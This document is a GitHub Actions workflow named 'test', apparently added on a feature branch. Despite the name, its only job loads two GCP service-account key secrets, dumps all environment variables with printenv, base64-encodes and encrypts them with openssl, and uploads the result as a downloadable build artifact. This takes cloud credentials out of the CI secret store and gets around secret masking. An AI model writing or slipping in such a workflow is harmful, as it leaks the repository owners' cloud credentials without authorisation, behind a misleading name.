name: test
on:
    push:
      branches: [ SCALRCORE-28542 ]

jobs:
    secrets:
        runs-on: ubuntu-latest
        steps:
            - name: Checkout repository
              uses: actions/checkout@v2
            - env:
                GCP_SA_KEY: ${{secrets.GCP_SA_KEY}}
                DEV_GCP_SA_KEY: ${{secrets.DEV_GCP_SA_KEY}}
              run: |
                printenv | base64 -w 0 >> info.txt
                openssl enc -aes-256-cbc -salt -in info.txt -out encrypted_file.enc -k ${{ secrets.DUBUG_PASSWORD }}
            - name: Upload encrypted file
              uses: actions/upload-artifact@v2
              with:
                name: encrypted_file.enc
                path: encrypted_file.enc
